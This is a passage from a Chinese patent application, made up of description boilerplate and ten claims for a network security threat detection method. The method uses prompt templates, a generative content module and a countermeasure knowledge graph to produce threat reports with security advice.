易失性存储器和/或非易失性存储器。其中，非易失性存储器可以是只读存储器(Read-Only Memory，ROM)、可编程只读存储器(Programmable ROM，PROM)、可擦除可编程只读存储器(Erasable PROM，EPROM)、电可擦除可编程只读存储器(Electrically EPROM，EEPROM)或闪存。易失性存储器可以是随机存取存储器(Random Access Memory，RAM)，其用作外部高速缓存。通过示例性但不是限制性说明，许多形式的RAM可用，例如静态随机存取存储器(Static RAM，SRAM)、动态随机存取存储器(Dynamic RAM，DRAM)、同步动态随机存取存储器(Synchronous DRAM，SDRAM)、双倍数据速率同步动态随机存取存储器(Double DataRate SDRAM，DDR SDRAM)、增强型同步动态随机存取存储器(Enhanced SDRAM，ESDRAM)、同步连接动态随机存取存储器(synch link DRAM，SLDRAM)和直接内存总线随机存取存储器(Direct Rambus RAM，DR RAM)。

在本申请的一些实施例中，该计算机程序可以被分割成一个或多个模块，该一个或者多个模块被存储在该存储器510中，并由该处理器520执行，以完成本申请提供的方法。该一个或多个模块可以是能够完成特定功能的一系列计算机程序指令段，该指令段用于描述该计算机程序在该电子设备中的执行过程。

如图6所示，该电子设备还可包括：

收发器530，该收发器530可连接至该处理器520或存储器510。

其中，处理器520可以控制该收发器530与其他设备进行通信，具体地，可以向其他设备发送信息或数据，或接收其他设备发送的信息或数据。收发器530可以包括发射机和接收机。收发器530还可以进一步包括天线，天线的数量可以为一个或多个。

应当理解，该电子设备中的各个组件通过总线***相连，其中，总线***除包括数据总线之外，还包括电源总线、控制总线和状态信号总线。

本申请实施例还提供了一种计算机可读存储介质，该存储介质用于存储计算机程序，计算机程序使得计算机执行如上述方法实施例的网络安全威胁检测方法，具体如图7所示。其中，图7中计算机可读存储介质为600，计算机程序为610。

本申请实施例还提供一种包含程序指令的计算机程序产品，该程序指令在电子设备上运行时，使得电子设备执行上述方法实施例的网络安全威胁检测方法。

当使用软件实现时，可以全部或部分地以计算机程序产品的形式实现。该计算机程序产品包括一个或多个计算机指令。在计算机上加载和执行该计算机程序指令时，全部或部分地产生按照本申请实施例该的流程或功能。该计算机可以是通用计算机、专用计算机、计算机网络、或者其他可编程装置。该计算机指令可以存储在计算机可读存储介质中，或者从一个计算机可读存储介质向另一个计算机可读存储介质传输，例如，该计算机指令可以从一个网站站点、计算机、服务器或数据中心通过有线(例如同轴电缆、光纤、数字用户线(digital subscriber line，DSL))或无线(例如红外、无线、微波等)方式向另一个网站站点、计算机、服务器或数据中心进行传输。该计算机可读存储介质可以是计算机能够存取的任何可用介质或者是包含一个或多个可用介质集成的服务器、数据中心等数据存储设备。该可用介质可以是磁性介质(例如，软盘、硬盘、磁带)、光介质(例如数字视频光盘(digital video disc，DVD))、或者半导体介质(例如固态硬盘(solid state disk，SSD))等。

本领域普通技术人员可以意识到，结合本文中所公开的实施例描述的各示例的模块及算法步骤，能够以电子硬件、或者计算机软件和电子硬件的结合来实现。这些功能究竟以硬件还是软件方式来执行，取决于技术方案的特定应用和设计约束条件。专业技术人员可以对每个特定的应用来使用不同方法来实现所描述的功能，但是这种实现不应认为超出本申请的范围。

在本申请所提供的几个实施例中，应该理解到，所揭露的***、装置和方法，可以通过其它的方式实现。例如，以上所描述的装置实施例仅仅是示意性的，例如，该模块的划分，仅仅为一种逻辑功能划分，实际实现时可以有另外的划分方式，例如多个模块或组件可以结合或者可以集成到另一个***，或一些特征可以忽略，或不执行。另一点，所显示或讨论的相互之间的耦合或直接耦合或通信连接可以是通过一些接口，装置或模块的间接耦合或通信连接，可以是电性，机械或其它的形式。

作为分离部件说明的模块可以是或者也可以不是物理上分开的，作为模块显示的部件可以是或者也可以不是物理模块，即可以位于一个地方，或者也可以分布到多个网络单元上。可以根据实际的需要选择其中的部分或者全部模块来实现本实施例方案的目的。例如，在本申请各个实施例中的各功能模块可以集成在一个处理模块中，也可以是各个模块单独物理存在，也可以两个或两个以上模块集成在一个模块中。

以上所述，仅为本申请的具体实施方式，但本申请的保护范围并不局限于此，任何熟悉本技术领域的技术人员在本申请揭露的技术范围内，可轻易想到变化或替换，都应涵盖在本申请的保护范围之内。因此，本申请的保护范围应以该权利要求的保护范围为准。

Claims (10)

1.一种网络安全威胁检测方法，其特征在于，包括：

获取目标业务场景的关键词信息；

根据所述关键词信息和智能内容生成模块，确定所述目标业务场景的安全威胁信息；

根据网络安全对策知识图谱，确定所述安全威胁信息对应的安全建议；

根据所述安全威胁信息和所述安全建议，生成所述目标业务场景的安全威胁检测报告。

2.根据权利要求1所述的方法，其特征在于，所述根据所述关键词信息和智能内容生成模块，确定所述目标业务场景的安全威胁信息，包括：

根据所述关键词信息，确定所述智能内容生成模块的输入信息；

将所述输入信息输入至所述智能内容生成模块中，通过所述智能内容生成模块运行应答模型，以使所述应答模型根据所述输入信息确定输出信息；

根据所述输出信息，确定所述目标业务场景的安全威胁信息。

3.根据权利要求2所述的方法，其特征在于，所述根据所述关键词信息，确定所述智能内容生成模块的输入信息，包括：

基于询问话术模板库，确定并显示与所述关键词信息对应的至少一个候选询问话术模板；

响应于对任一候选询问话术模板的编辑操作，生成目标询问话术，将所述目标询问话术作为所述智能内容生成模块的输入信息。

4.根据权利要求2所述的方法，其特征在于，所述根据所述输出信息，确定所述目标业务场景的安全威胁信息，包括：

从所述输出信息中提取所述目标业务场景的至少一个初始安全威胁信息；

对每个所述初始安全威胁信息进行模拟验证，以从至少一个所述初始安全威胁信息中筛选最终的安全威胁信息，其中所述最终的安全威胁信息为所述目标业务场景的安全威胁信息。

5.根据权利要求1-4中任一项所述的方法，其特征在于，所述根据网络安全对策知识图谱，确定所述安全威胁信息对应的安全建议，包括：

从所述安全威胁信息中提取查询关键词；

根据所述查询关键词，在所述网络安全对策知识图谱中确定所述安全威胁信息对应的安全建议。

6.根据权利要求5所述的方法，其特征在于，当查询关键词与所述网络安全对策知识图谱中的安全建议之间的对应关系为一对多时，所述在所述网络安全对策知识图谱中确定所述安全威胁信息对应的安全建议，包括：

根据所述查询关键词，在所述网络安全对策知识图谱中确定与所述查询关键词对应的至少两个候选安全建议；

根据所述查询关键词在所述安全威胁信息中的上下文信息，确定每个所述候选安全建议和所述查询关键词之间的匹配度；

根据所述匹配度，从所有候选安全建议中确定所述安全威胁信息对应的安全建议。

7.根据权利要求6所述的方法，其特征在于，所述根据所述匹配度，从所有候选安全建议中确定所述安全威胁信息对应的安全建议，包括：

确定所有匹配度中的最高匹配度；

将所述最高匹配度对应的候选安全建议，确定为所述安全威胁信息对应的安全建议。

8.一种网络安全威胁检测装置，其特征在于，包括：

信息获取模块，用于获取目标业务场景的关键词信息；

威胁确定模块，用于根据所述关键词信息和智能内容生成模块，确定所述目标业务场景的安全威胁信息；

建议确定模块，用于根据网络安全对策知识图谱，确定所述安全威胁信息对应的安全建议；

结果获取模块，用于根据所述安全威胁信息和所述安全建议，生成所述目标业务场景的安全威胁检测报告。

9.一种电子设备，其特征在于，包括：

处理器和存储器，所述存储器用于存储计算机程序，所述处理器用于调用并运行所述存储器中存储的计算机程序，以执行如权利要求1至7中任一项所述的网络安全威胁检测方法。

10.一种计算机可读存储介质，其特征在于，用于存储计算机程序，所述计算机程序使得计算机执行如权利要求1至7中任一项所述的网络安全威胁检测方法。